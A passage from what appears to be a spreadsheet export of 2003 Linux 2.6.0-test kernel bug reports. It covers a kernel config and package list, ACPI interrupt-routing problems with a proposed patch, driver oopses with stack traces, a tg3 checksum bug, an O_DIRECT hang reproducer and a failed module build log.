not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set # CONFIG_USB_PRINTER is not set # CONFIG_USB_STORAGE is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=y CONFIG_USB_HIDINPUT=y CONFIG_HID_FF=y # CONFIG_HID_PID is not set CONFIG_LOGITECH_FF=y # CONFIG_THRUSTMASTER_FF is not set # CONFIG_USB_HIDDEV is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_AX8817X_STANDALONE is not set # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set CONFIG_USB_USBNET=y # # USB Host-to-Host Cables # # CONFIG_USB_AN2720 is not set # CONFIG_USB_BELKIN is not set # CONFIG_USB_GENESYS is not set # CONFIG_USB_NET1080 is not set # CONFIG_USB_PL2301 is not set # # Intelligent USB Devices/Gadgets # # CONFIG_USB_ARMLINUX is not set # CONFIG_USB_EPSON2888 is not set CONFIG_USB_ZAURUS=y # CONFIG_USB_CDCETHER is not set # # USB Network Adapters # # CONFIG_USB_AX8817X is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_AUERSWALD is not set # CONFIG_USB_RIO500 is not set # CONFIG_USB_BRLVGER is not set # CONFIG_USB_LCD is not set # CONFIG_USB_TEST is not set # CONFIG_USB_GADGET is not set # # Bluetooth support # # CONFIG_BT is not set # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set CONFIG_DEBUG_SPINLOCK_SLEEP=y # CONFIG_FRAME_POINTER is not set # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y CONFIG_CRYPTO_NULL=y CONFIG_CRYPTO_MD4=y CONFIG_CRYPTO_MD5=y CONFIG_CRYPTO_SHA1=y CONFIG_CRYPTO_SHA256=y CONFIG_CRYPTO_SHA512=y CONFIG_CRYPTO_DES=y CONFIG_CRYPTO_BLOWFISH=y CONFIG_CRYPTO_TWOFISH=y CONFIG_CRYPTO_SERPENT=y CONFIG_CRYPTO_AES=y CONFIG_CRYPTO_CAST5=y CONFIG_CRYPTO_CAST6=y CONFIG_CRYPTO_DEFLATE=y # CONFIG_CRYPTO_TEST is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_ZLIB_INFLATE=y CONFIG_ZLIB_DEFLATE=y CONFIG_X86_BIOS_REBOOT=y ------------------------------------------------ Gentoo Installed Package Version Status: ./sys-kernel ./sys-kernel/development-sources-2.6.0_beta2 ./sys-kernel/development-sources-2.6.0_beta3 ./sys-kernel/development-sources-2.6.0_beta4 ./sys-kernel/development-sources-2.6.0_beta5 ./sys-kernel/linux-headers-2.4.19 ./sys-kernel/vanilla-sources-2.4.21 ./sys-kernel/vanilla-sources-2.4.22 ./dev-cpp ./dev-cpp/gtkmm-1.2.9-r2 ./dev-cpp/gnomemm-1.2.3-r1 ./x11-base ./x11-base/xfree-4.3.0-r2 ./x11-base/opengl-update-1.5 ./x11-base/xfree-drm-4.3.0-r6 ./x11-libs ./x11-libs/qt-2.3.2-r1 ./x11-libs/wxGTK-2.4.0 ./x11-libs/pango-1.2.3 ./x11-libs/pango-1.2.1-r1 ./x11-libs/libwnck-2.2.1 ./x11-libs/gtk+-2.2.1-r1 ./x11-libs/gtk+-1.2.10-r10 ./x11-libs/qt-3.1.2-r4 ./x11-libs/openmotif-2.2.2-r1 ./x11-libs/Xaw3d-1.5-r1 ./x11-libs/startup-notification-0.5 ./x11-misc ./x11-misc/ttmkfdir-3.0.9 ./x11-misc/grpn-1.1.2 ./x11-misc/xloadimage-4.1-r1 ./games-strategy ./games-strategy/liquidwar-5.5.9 ./games-strategy/freecraft-fcmp-1.18-r1 ./games-strategy/freecraft-1.18-r1 ./dev-tcltk ./dev-tcltk/itcl-3.2-r2 ./app-admin ./app-admin/sudo-1.6.7_p5 ./app-admin/addpatches-0.2 ./app-admin/metalog-0.6-r10 ./app-admin/fam-oss-2.6.9-r3 ./app-admin/apg-2.1.0 ./app-dicts ./app-dicts/aspell-en-0.51.0 ./app-crypt ./app-crypt/mit-krb5-1.2.7 ./app-crypt/kgpg-1.0.0 ./app-crypt/gnupg-1.2.2-r1 ./app-crypt/mhash-0.8.18-r1 ./app-crypt/gringotts-1.2.3 ./app-games ./x11-themes ./x11-themes/gtk-engines-thinice-2.0.2 ./x11-themes/gnome-themes-2.2.1 ./x11-themes/gtk-engines-metal-2.2.0 ./x11-themes/gtk-engines-pixbuf-2.2.0 ./x11-themes/gtk-engines-redmond95-2.2.0 ./x11-themes/gnome-icon-theme-1.0.5 ./gnome-base ./gnome-base/libglade-2.0.1 ./gnome-base/gnome-vfs-2.2.4 ./gnome-base/libgnomeprint-2.2.1.2 ./gnome-base/gnome-vfs-1.0.5-r3 ./gnome-base/libglade-0.17-r6 ./gnome-base/bonobo-activation-2.2.2 ./gnome-base/libghttp-1.0.9-r3 ./gnome-base/gconf-1.0.8-r5 ./gnome-base/gnome-panel-1.4.2-r2 ./gnome-base/ORBit2-2.6.1 ./gnome-base/control-center-1.4.0.5-r1 ./gnome-base/gail-1.2.1 ./gnome-base/libbonobo-2.2.2 ./gnome-base/gnome-desktop-2.2.1-r1 ./gnome-base/oaf-0.6.10 ./gnome-base/gnome-panel-2.2.2.1 ./gnome-base/gnome-common-1.2.4-r3 ./gnome-base/libbonoboui-2.2.0.1 ./gnome-base/gconf-2.2.0 ./gnome-base/ORBit-0.5.17 ./gnome-base/libgnomecanvas-2.2.0.2 ./gnome-base/libgnomeprintui-2.2.1.2 ./gnome-base/libgnomeui-2.2.1 ./gnome-base/gnome-print-0.35-r3 ./gnome-base/bonobo-1.0.22 ./gnome-base/gnome-libs-1.4.2 ./gnome-base/libgnome-2.2.2 ./gnome-base/gnome-mime-data-2.2.0 ./app-arch ./app-arch/cabextract-0.6 ./app-arch/ncompress-4.2.4 ./app-arch/rpm-4.0.4-r5 ./app-arch/unzip-5.50-r2 ./app-arch/rpm2targz-8.0 ./app-arch/zip-2.3-r1 ./app-misc ./app-misc/lirc-0.6.6-r1 ./app-misc/glimpse-4.15-r1 ./app-text ./app-text/openjade-1.3.1-r6 ./app-text/gnome-spell-1.0.4 ./app-text/jadetex-3.12 ./app-text/docbook-sgml-1.0 ./app-text/ghostscript-7.05.6-r3 ./app-text/xpdf-2.02.1 ./app-text/sablotron-0.97 ./app-text/texi2html-1.64 ./app-text/tetex-1.0.7-r13 ./app-text/aspell-0.50.3 ./app-text/sgmltools-lite-3.0.3-r6 ./app-text/enscript-1.6.3-r1 ./app-text/gnome-spell-0.5 ./app-text/docbook-sgml-utils-0.6.12 ./app-text/docbook-xsl-stylesheets-1.60.1 ./app-text/dgs-0.5.10-r1 ./app-text/docbook-sgml-dtd-4.2 ./app-text/docbook-sgml-dtd-3.0-r1 ./app-text/docbook-sgml-dtd-3.1-r1 ./app-text/docbook-dsssl-stylesheets-1.77-r2 ./app-text/psutils-1.17 ./app-text/docbook-sgml-dtd-4.0-r1 ./app-text/docbook-sgml-dtd-4.1-r1 ./app-text/docbook-xml-simple-dtd-4.1.2.4 ./app-text/sgml-common-0.6.3-r3 ./app-text/a2ps-4.13b-r4 ./app-text/scrollkeeper-0.3.11-r1 ./app-text/docbook-xml-dtd-4.1.2-r3 ./net-firewall ./net-firewall/iptables-1.2.8-r1 ./net-firewall/knetfilter-3.1.1 ./net-firewall/kmyfirewall-0.9.6 ./app-portage ./app-portage/kemerge-0.7 ./app-portage/kportage-0.6.1 ./app-portage/gentoolkit-0.1.28 ./app-portage/mirrorselect-0.7-r1 ./sys-devel ./sys-devel/make-3.80 ./sys-devel/libtool-1.4.3-r1 ./sys-devel/bin86-0.16.0 ./sys-devel/bison-1.35 ./sys-devel/gcc-config-1.3.3-r1 ./sys-devel/automake-1.7.5-r2 ./sys-devel/patch-2.5.9 ./sys-devel/autoconf-2.57-r1 ./sys-devel/binutils-2.14.90.0.6-r2 ./sys-devel/gdb-5.3 ./sys-devel/gnuconfig-20030708 ./sys-devel/flex-2.5.4a-r5 ./sys-devel/m4-1.4 ./sys-devel/bc-1.06-r5 ./sys-devel/gcc-3.2.3-r1 ./sys-devel/gettext-0.11.5-r1 ./sys-devel/libperl-5.8.0 ./dev-db ./dev-db/postgresql-7.3.3 ./dev-db/unixODBC-2.0.6 ./dev-db/mysql-4.0.13-r3 ./kde-base ./kde-base/kdeutils-3.1.3 ./kde-base/kde-3.1.3 ./kde-base/kdeadmin-3.1.3 ./kde-base/kdegraphics-3.1.3 ./kde-base/kdetoys-3.1.3 ./kde-base/kdegames-3.1.3 ./kde-base/kdemultimedia-3.1.3 ./kde-base/kdeartwork-3.1.3 ./kde-base/kdeedu-3.1.3 ./kde-base/kdeaddons-3.1.3 ./kde-base/arts-1.1.3 ./kde-base/kdepim-3.1.3 ./kde-base/kdenetwork-3.1.3 ./kde-base/kdebindings-3.1.2 ./kde-base/kdebindings-3.1.3 ./kde-base/kdelibs-3.1.3-r1 ./kde-base/kde-env-3-r2 ./kde-base/kdebase-3.1.3 ./media-gfx ./media-gfx/gimp-1.2.4 ./media-gfx/sane-backends-1.0.11 ./media-gfx/gphoto2-2.1.1-r1 ./media-gfx/transfig-3.2.4-r1 ./media-gfx/imagemagick-5.5.6-r1 ./media-gfx/gimp-print-4.2.5 ./media-gfx/graphviz-1.9 ./net-ftp ./net-ftp/ftp-0.17-r2 ./net-ftp/curl-7.10.5-r1 ./net-nds ./net-nds/portmap-5b-r7 ./net-www ./net-www/lynx-2.8.4.1c ./net-www/mozilla-1.4-r3 ./net-www/htdig-3.1.6-r4 ./media-libs ./media-libs/libsndfile-1.0.4 ./media-libs/id3lib-3.8.3-r1 ./media-libs/libdvdnav-0.1.3 ./media-libs/divx4linux-20020418-r2 ./media-libs/lcms-1.09 ./media-libs/xine-lib-1_beta12 ./media-libs/aalib-1.4_rc4-r2 ./media-libs/glut-3.7.1 ./media-libs/t1lib-1.3.1 ./media-libs/libpng-1.2.5-r4 ./media-libs/libao-0.8.3-r1 ./media-libs/ming-0.2a ./media-libs/libvorbis-1.0-r2 ./media-libs/libdvdcss-1.2.6 ./media-libs/fontconfig-2.2.1 ./media-libs/freetype-1.3.1-r3 ./media-libs/libungif-4.1.0.1b ./media-libs/giflib-4.1.0-r3 ./media-libs/libogg-1.0 ./media-libs/imlib-1.9.14-r1 ./media-libs/libart_lgpl-2.3.14 ./media-libs/libgphoto2-2.1.1-r2 ./media-libs/win32codecs-0.90.1-r2 ./media-libs/alsa-lib-0.9.2 ./media-libs/libsdl-1.2.5-r2 ./media-libs/svgalib-1.4.3-r4 ./media-libs/flac-1.1.0 ./media-libs/libmad-0.15.0b-r1 ./media-libs/a52dec-0.7.4 ./media-libs/nas-1.6 ./media-libs/quicktime4linux-1.5.5-r1 ./media-libs/audiofile-0.2.3-r1 ./media-libs/libexif-0.5.9 ./media-libs/libflash-0.4.10-r1 ./media-libs/allegro-4.0.3 ./media-libs/faad2-1.1 ./media-libs/mpeg-lib-1.3.1-r1 ./media-libs/libmpeg3-1.5-r1 ./media-libs/libggi-2.0.1-r1 ./media-libs/jbigkit-1.4 ./media-libs/xvid-0.9.1 ./media-libs/freetype-2.1.4 ./media-libs/libmikmod-3.1.10-r1 ./media-libs/libgii-0.8.1 ./media-libs/jpeg-6b-r3 ./media-libs/libswf-0.99 ./media-libs/pdflib-4.0.3-r1 ./media-libs/libmng-1.0.4 ./media-libs/libdvdread-0.9.4 ./media-libs/libwmf-0.2.8 ./media-libs/libdv-0.99 ./media-libs/libfame-0.9.0 ./media-libs/compface-1.4 ./media-libs/libid3tag-0.15.0b ./media-libs/tiff-3.5.7-r1 ./media-libs/gdk-pixbuf-0.21.0 ./media-libs/netpbm-10.11.5-r2 ./sys-apps ./sys-apps/pam-login-3.11 ./sys-apps/hotplug-20030501-r2 ./sys-apps/netkit-base-0.17-r8 ./sys-apps/hdparm-5.4 ./sys-apps/man-1.5l-r6 ./sys-apps/sed-4.0.7 ./sys-apps/util-linux-2.11z-r6 ./sys-apps/findutils-4.1.7-r4 ./s</t>
  </si>
  <si>
    <t>SCI: irq 20: nobody cared! - ASUS P4T-E</t>
  </si>
  <si>
    <t>2003-09-12 06:00 UTC</t>
  </si>
  <si>
    <t>Robert Penz</t>
  </si>
  <si>
    <t>2004-04-12 22:14 UTC</t>
  </si>
  <si>
    <t>Distribution: suse8.2 Hardware Environment: p4-northwood i850 board Software Environment: suse8.2 2.6.0-test4 test-rpm Problem Description: if acpi is enable it hanges after that line "Using anticipatory scheduling elevator", with acpi=off it runs through. the acpi backport form suse does work on that machine. Steps to reproduce:</t>
  </si>
  <si>
    <t>pci=noacpi ineffective</t>
  </si>
  <si>
    <t>2003-09-12 07:46 UTC</t>
  </si>
  <si>
    <t>2004-03-04 11:54 UTC</t>
  </si>
  <si>
    <t>From: Thomas Schlichter Hi Andrew, the attached patch fixes interrupt routing probems for (at least 3) people with broken ACPI BIOSes. If only the ACPI interrupt routing part is broken, 'pci=noacpi' should help as the documantation states: pci=option[,option...] [...] noacpi [IA-32] Do not use ACPI for IRQ routing. The problem was that ACPI interrupt routing was not correctly disabled. The patch applies cleanly to 2.6.0-test4... Thomas --- linux-2.6.0-test4/arch/i386/kernel/acpi/boot.c.orig Sat Aug 23 01:59:02 2003 +++ linux-2.6.0-test4/arch/i386/kernel/acpi/boot.c Sat Aug 23 16:39:57 2003 @@ -41,6 +41,7 @@ #define PREFIX "ACPI: " extern int acpi_disabled; +extern int acpi_irq; extern int acpi_ht; int acpi_lapic = 0; @@ -407,7 +408,7 @@ * If MPS is present, it will handle them, * otherwise the system will stay in PIC mode */ - if (acpi_disabled) { + if (acpi_disabled || !acpi_irq) { return 1; } --- linux-2.6.0-test4/arch/i386/kernel/setup.c.orig Sat Aug 23 01:55:38 2003 +++ linux-2.6.0-test4/arch/i386/kernel/setup.c Sat Aug 23 16:34:21 2003 @@ -71,6 +71,7 @@ EXPORT_SYMBOL(acpi_disabled); #ifdef CONFIG_ACPI_BOOT + int acpi_irq __initdata = 1; /* enable IRQ */ int acpi_ht __initdata = 1; /* enable HT */ #endif @@ -542,6 +543,11 @@ else if (!memcmp(from, "acpi=ht", 7)) { acpi_ht = 1; if (!acpi_force) acpi_disabled = 1; + } + + /* "pci=noacpi" disables ACPI interrupt routing */ + else if (!memcmp(from, "pci=noacpi", 10)) { + acpi_irq = 0; } #ifdef CONFIG_X86_LOCAL_APIC On Monday 25 August 2003 03:13, Peter Lieverdink wrote: &gt; Hi Thomas, &gt; &gt; Your patch works beautifully. 'acpi=nopci' previously caused IDE to work &gt; fine, but made the kernel not detect USB and network devices. With your &gt; patch it sees all peripherals AND acpi is available for the cpu. I wonder &gt; if it would be accepted into the kernel as a patch to workaround buggy acpi &gt; bioses. &gt; &gt; Thanks heaps! &gt; &gt; - Peter. &gt; -- &gt; &gt; At 23:44 24/08/2003 +0200, you wrote: &gt; &gt;Am Sunday 24 August 2003 22:54 schrieb David van Hoose: &gt; &gt; &gt; Kevin P. Fleming wrote: &gt; &gt; &gt; &gt; Peter Lieverdink wrote: &gt; &gt; &gt; &gt;&gt; When I enable ACPI on 2.6.0-test4 (also on 2.6.0-test3-*), the &gt; &gt; &gt; &gt;&gt; kernel no longer recognises my IDE controller and drops down to PIO &gt; &gt; &gt; &gt;&gt; mode for harddisk access. Additionally, USB devices don't get &gt; &gt; &gt; &gt;&gt; detected. &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; I'm running -test4 here with ACPI and have no trouble with USB &gt; &gt; &gt; &gt; devices. &gt; &gt; &gt; &gt; &gt; &gt; I'm running test4 here with ACPI and have no USB following a call trace &gt; &gt; &gt; with "IRQ 20: nobody cared". ACPI seems to make odd reports. I've been &gt; &gt; &gt; having this problem since 2.5.70'ish. Posted numerous times, but nobody &gt; &gt; &gt; seems to care about it. I also have a PS/2 mouse detection when I have &gt; &gt; &gt; no mice attached to my system. &gt; &gt; &gt; &gt; &gt; &gt; &gt;&gt; The system is an Athlon 2400+ on a Gibabyte GA-7VAXP mainboard. &gt; &gt; &gt; &gt;&gt; (KT400) &gt; &gt; &gt; &gt; &gt; &gt; &gt; &gt; My system is an Athlon 1000 on an MSI KT266-based board. &gt; &gt; &gt; &gt; &gt; &gt; I have a Pentium 4 2.53 GHz on a Asus P4S8X mainboard. &gt; &gt; &gt; &gt; &gt; &gt; -David &gt; &gt; &gt; &gt; &gt; &gt; PS. dmesg is attached with ACPI debug and USB debug enabled. &gt; &gt; &gt; &gt;I had similar problems with my Epox 8K9A (KT400) Board. &gt; &gt; &gt; &gt;If I wanted to use my USB ports I had to boot wiht 'acpi=off'. But with &gt; &gt; the patch attached it is possible for me to boot with 'pci=noacpi'. It &gt; &gt; has the advantage that ACPI stays enabled... &gt; &gt; &gt; &gt;You are free to give it a try... &gt; &gt; &gt; &gt; Thomas On Sunday 10 August 2003 01:24, Joonas Koivunen: &gt; On Saturday 09 August 2003 19:02, Thomas Schlichter wrote: &gt; &gt; It's not a problem with ACPI, it's more a problem with the interrupt &gt; &gt; routing based on the ACPI tables. These tables seem to be not correctly &gt; &gt; implemented in the BIOS and, as the german EPOX support admits, are not &gt; &gt; really tested. To change this you may contact the EPOX support and &gt; &gt; describe your problems, too.... &gt; &gt; Thanks for letting me know.. I had a image of EPOX being pretty good with &gt; motherboards.. Guess not then. &gt; &gt; &gt; If you want to use ACPI while this BIOS bug is not fixed you may use the &gt; &gt; attached patch and boot with pci=noacpi. Without the patch this doesn't &gt; &gt; work for me here... &gt; &gt; Why isn't this patch in the mainstream kernel? There are many other &gt; chipset/bios fixes in the kernel.. This would save many &gt; reboot/recompilings/worries until or if ever epox does something with the &gt; bios. &gt; &gt; The patch works nicely. Though I did apply it manually to -test3 :) But it &gt; works. &gt; &gt; &gt; Best regards &gt; &gt; Thomas Schlichter &gt; &gt; Thanks again &gt; -rzei</t>
  </si>
  <si>
    <t>dhcpcd using 100% CPU</t>
  </si>
  <si>
    <t>2003-09-12 09:44 UTC</t>
  </si>
  <si>
    <t>Jonathan Geisler</t>
  </si>
  <si>
    <t>2003-10-04 15:37 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Gateway 600YG2 2.4GHz Pentium 4M w/ 512 MB RAM Software Environment: fvwm and some xterms Problem Description: When I woke up this morning, the load meter was pegged at one with the CPU fan going non-stop. Upon investigating, I found dhcpcd was using almost 100% CPU and when I tried to kill it, it wouldn't die. shutdown -h wouldn't complete, either (I presume because it also couldn't kill dhcpcd) and had to manually turn the computer off. Steps to reproduce: Unknown. If it happens again, I would like some further steps to take to give a more detailed error report.</t>
  </si>
  <si>
    <t>Oops with SynCE and Compaq iPAQ 3600</t>
  </si>
  <si>
    <t>2.6.0-test5-bk3</t>
  </si>
  <si>
    <t>2003-09-13 12:00 UTC</t>
  </si>
  <si>
    <t>2003-12-01 11:47 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE Linux 8.2 Hardware Environment: Pentium V 2.0Ghz Intel 845 motherboard (uhci-hcd) Compaq iPAQ 3660 with USB craddle Software Environment: SynCE 0.8.3 Problem Description: Performing the following steps causes the kernel to oops and freeze. The kernel oops is attached to this bug report. I have also attached the .config file used to compile the kernel. Steps to reproduce: 1. boot 2.6.0-test5-bk3 2. modprobe ipaq 3. synce-serial-config ttyUSB0 4. dccm 5. synce-serial-start</t>
  </si>
  <si>
    <t>linux-2.6.0-test5</t>
  </si>
  <si>
    <t>Thomas Wolfe</t>
  </si>
  <si>
    <t>scripts/mkconfigs uses deprecated 'head -1' syntax</t>
  </si>
  <si>
    <t>2003-09-14 16:58 UTC</t>
  </si>
  <si>
    <t>2003-11-26 16:32 UTC</t>
  </si>
  <si>
    <t>latest coreutils deprecated the usage of 'head -1' head will just error and not output anything: head: `-1' option is obsolete; use `-n 1' Try `head --help' for more information. the scripts/mkconfigs uses head -1 while generating the KERNVER value root@vapier 0 linux # grep 'head -1' scripts/mkconfigs KERNVER="`grep VERSION $1 | head -1 | cut -f3 -d' '`.`grep PATCHLEVEL $1 | head -1 | cut -f3 -d' '`.`grep SUBLEVEL $1 | head -1 | cut -f3 -d' '``grep EXTRAVERSION $1 | head -1 | cut -f3 -d' '`"</t>
  </si>
  <si>
    <t>rmmod of ide-scsi results in an oops</t>
  </si>
  <si>
    <t>2003-09-14 21:30 UTC</t>
  </si>
  <si>
    <t>rsr-web-bugzilla.kernel.org</t>
  </si>
  <si>
    <t>Distribution: debian Hardware Environment: athlon 700mhz Software Environment: Problem Description: rmmod ide_scsi: Unable to handle kernel NULL pointer dereference at virtual address 00000024 printing eip: c0171047 *pde = 00000000 Oops: 0002 [#1] CPU: 0 EIP: 0060:[&lt;c0171047&gt;] Not tainted EFLAGS: 00010202 EIP is at simple_rmdir+0x27/0x50 eax: 00000000 ebx: da831440 ecx: da83145c edx: ffffffd9 esi: dbeae980 edi: c8a24000 ebp: da83145c esp: c8a25ed0 ds: 007b es: 007b ss: 0068 Process rmmod (pid: 548, threadinfo=c8a24000 task=c897c750) Stack: da831440 dbeae380 da831140 da831440 c018409c dbeae980 da831440 dbea4f00 da831440 c018417c da831440 dbea4f00 df10b8c4 e090ce60 e090cda0 c8a24000 c020e563 df10b8c4 c046ff60 df10b8c4 df10b8a0 c024b000 df10b8c4 c0507090 Call Trace: [&lt;c018409c&gt;] remove_dir+0x4c/0x70 [&lt;c018417c&gt;] sysfs_remove_dir+0xac/0x110 [&lt;c020e563&gt;] kobject_del+0x43/0x70 [&lt;c024b000&gt;] device_del+0x70/0xa0 [&lt;e090b00d&gt;] idescsi_cleanup+0x4d/0x60 [ide_scsi] [&lt;c027e011&gt;] ide_unregister_driver+0x71/0xc8 [&lt;e090bb27&gt;] exit_idescsi_module+0x27/0x2b [ide_scsi] [&lt;c01327fb&gt;] sys_delete_module+0x11b/0x140 [&lt;c0146b24&gt;] sys_munmap+0x44/0x70 [&lt;c010915b&gt;] syscall_call+0x7/0xb</t>
  </si>
  <si>
    <t>[tg3] miscomputing of checksums if icmp pkg &gt; MTU</t>
  </si>
  <si>
    <t>2003-09-15 08:54 UTC</t>
  </si>
  <si>
    <t>Björn Jacke</t>
  </si>
  <si>
    <t>2003-12-18 01:06 UTC</t>
  </si>
  <si>
    <t>Distribution: SuSE 9.0 Hardware Environment: dual XEON 3GHz, ht enabled Problem Description: running a 2.6.0-test5-bk3 on a dual XEON machine, ping packets that are larger than the MTU of the device have wrong checksums and are thrown away by the target host. The network card is a NetXtreme BCM5703 (tg3) but the effect also occurs when pinging localhost with packet sizes bigger than the MTU. The same system with a recent 2.4 kernel works fine in this concern. Steps to reproduce: ping -s 17000 localhost or ping -s 2000 some_remote_host</t>
  </si>
  <si>
    <t>use O_DIRECT open file, when read will hang.</t>
  </si>
  <si>
    <t>2.6.0-test5-mm2</t>
  </si>
  <si>
    <t>2003-09-18 21:43 UTC</t>
  </si>
  <si>
    <t>hugang</t>
  </si>
  <si>
    <t>2004-07-17 17:54 UTC</t>
  </si>
  <si>
    <t>Steps to reproduce: rm -f /tmp/1.log touch /tmp/1.log echo &lt;&lt; EOF &gt; /tmp/hang.c #include &lt;sys/types.h&gt; #include &lt;asm/fcntl.h&gt; main() { int i; char buf[1025]; i = open("/tmp/1.log", O_RDONLY | 040000, 0); if ( i != -1) { read(i, buf, 1); } printf("'%s'", buf); } EOF gcc -o /tmp/hang /tmp/hang.c /tmp/hang</t>
  </si>
  <si>
    <t>Failed module build</t>
  </si>
  <si>
    <t>2.6.0 test5</t>
  </si>
  <si>
    <t>2003-09-20 12:14 UTC</t>
  </si>
  <si>
    <t>jbwyatt4</t>
  </si>
  <si>
    <t>2003-10-30 20:14 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sid(latest up to date), MEPIS Hardware Environment: HP Pavilion 533c, Pentium 4, 845G Intergrated graphics/sound/network/modem Software Environment: gcc 3.3.2(20030908 -Debian prerelease) Problem Description: make modules failed to build all the way Steps to reproduce: Install nfs-utils Do the kernel dance with xconfig in root LD drivers/message/i2o/built-in.o LD drivers/misc/built-in.o CC drivers/net/Space.o CC drivers/net/net_init.o CC drivers/net/loopback.o LD drivers/net/arcnet/built-in.o LD drivers/net/bonding/built-in.o LD drivers/net/e100/built-in.o LD drivers/net/e1000/built-in.o LD drivers/net/fc/built-in.o LD drivers/net/sk98lin/built-in.o LD drivers/net/skfp/built-in.o LD drivers/net/wan/built-in.o LD drivers/net/wireless/built-in.o CC drivers/net/mii.o LD drivers/net/built-in.o LD drivers/parport/built-in.o CC drivers/pci/access.o CC drivers/pci/bus.o CC drivers/pci/probe.o CC drivers/pci/remove.o CC drivers/pci/pci.o CC drivers/pci/pool.o CC drivers/pci/quirks.o HOSTCC drivers/pci/gen-devlist DEVLIST drivers/pci/devlist.h CC drivers/pci/names.o CC drivers/pci/pci-driver.o CC drivers/pci/search.o CC drivers/pci/pci-sysfs.o CC drivers/pci/power.o CC drivers/pci/proc.o CC drivers/pci/setup-res.o LD drivers/pci/built-in.o CC drivers/pnp/core.o CC drivers/pnp/card.o CC drivers/pnp/driver.o CC drivers/pnp/resource.o CC drivers/pnp/manager.o CC drivers/pnp/support.o CC drivers/pnp/interface.o CC drivers/pnp/quirks.o CC drivers/pnp/system.o LD drivers/pnp/built-in.o CC drivers/scsi/scsi.o CC drivers/scsi/hosts.o CC drivers/scsi/scsi_ioctl.o CC drivers/scsi/constants.o CC drivers/scsi/scsicam.o CC drivers/scsi/scsi_error.o CC drivers/scsi/scsi_lib.o CC drivers/scsi/scsi_scan.o CC drivers/scsi/scsi_syms.o CC drivers/scsi/scsi_sysfs.o CC drivers/scsi/scsi_devinfo.o CC drivers/scsi/scsi_sysctl.o CC drivers/scsi/scsi_proc.o CC drivers/scsi/sd.o CC drivers/scsi/sr.o CC drivers/scsi/sr_ioctl.o CC drivers/scsi/sr_vendor.o LD drivers/scsi/scsi_mod.o LD drivers/scsi/aacraid/built-in.o SHIPPED drivers/scsi/aic7xxx/aic7xxx_seq.h SHIPPED drivers/scsi/aic7xxx/aic7xxx_reg.h CC drivers/scsi/aic7xxx/aic7xxx_core.o CC drivers/scsi/aic7xxx/aic7xxx_93cx6.o CC drivers/scsi/aic7xxx/aic7770.o CC drivers/scsi/aic7xxx/aic7xxx_pci.o SHIPPED drivers/scsi/aic7xxx/aic7xxx_reg_print.c CC drivers/scsi/aic7xxx/aic7xxx_reg_print.o CC drivers/scsi/aic7xxx/aic7xxx_osm.o CC drivers/scsi/aic7xxx/aic7xxx_proc.o CC drivers/scsi/aic7xxx/aic7770_osm.o CC drivers/scsi/aic7xxx/aic7xxx_osm_pci.o LD drivers/scsi/aic7xxx/aic7xxx.o LD drivers/scsi/aic7xxx/built-in.o LD drivers/scsi/sym53c8xx_2/built-in.o CC drivers/scsi/gdth.o drivers/scsi/gdth.c:868: warning: `gdthtable' defined but not used CC drivers/scsi/ide-scsi.o LD drivers/scsi/sd_mod.o LD drivers/scsi/sr_mod.o CC drivers/scsi/sg.o LD drivers/scsi/built-in.o LD drivers/serial/built-in.o LD drivers/telephony/built-in.o LD drivers/usb/class/built-in.o CC drivers/usb/core/usb.o CC drivers/usb/core/usb-debug.o CC drivers/usb/core/hub.o CC drivers/usb/core/hcd.o CC drivers/usb/core/urb.o CC drivers/usb/core/message.o CC drivers/usb/core/config.o CC drivers/usb/core/file.o CC drivers/usb/core/buffer.o CC drivers/usb/core/driverfs.o CC drivers/usb/core/hcd-pci.o CC drivers/usb/core/devio.o CC drivers/usb/core/inode.o CC drivers/usb/core/devices.o LD drivers/usb/core/usbcore.o LD drivers/usb/core/built-in.o CC drivers/usb/host/ehci-hcd.o LD drivers/usb/host/built-in.o LD drivers/usb/image/built-in.o CC drivers/usb/input/hid-core.o CC drivers/usb/input/hiddev.o CC drivers/usb/input/hid-input.o LD drivers/usb/input/hid.o LD drivers/usb/input/built-in.o LD drivers/usb/media/built-in.o LD drivers/usb/misc/built-in.o LD drivers/usb/net/built-in.o LD drivers/usb/serial/built-in.o CC drivers/usb/storage/scsiglue.o CC drivers/usb/storage/protocol.o CC drivers/usb/storage/transport.o CC drivers/usb/storage/usb.o CC drivers/usb/storage/initializers.o CC drivers/usb/storage/debug.o CC drivers/usb/storage/shuttle_usbat.o CC drivers/usb/storage/raw_bulk.o CC drivers/usb/storage/sddr09.o CC drivers/usb/storage/sddr55.o CC drivers/usb/storage/freecom.o CC drivers/usb/storage/dpcm.o CC drivers/usb/storage/isd200.o CC drivers/usb/storage/datafab.o CC drivers/usb/storage/jumpshot.o LD drivers/usb/storage/usb-storage.o LD drivers/usb/storage/built-in.o LD drivers/usb/built-in.o LD drivers/video/aty/built-in.o CC drivers/video/console/dummycon.o CC drivers/video/console/vgacon.o LD drivers/video/console/built-in.o LD drivers/video/i810/built-in.o LD drivers/video/matrox/built-in.o LD drivers/video/riva/built-in.o LD drivers/video/sis/built-in.o CC drivers/video/fbmem.o CC drivers/video/fbmon.o CC drivers/video/fbcmap.o CC drivers/video/modedb.o CC drivers/video/softcursor.o CC drivers/video/vesafb.o 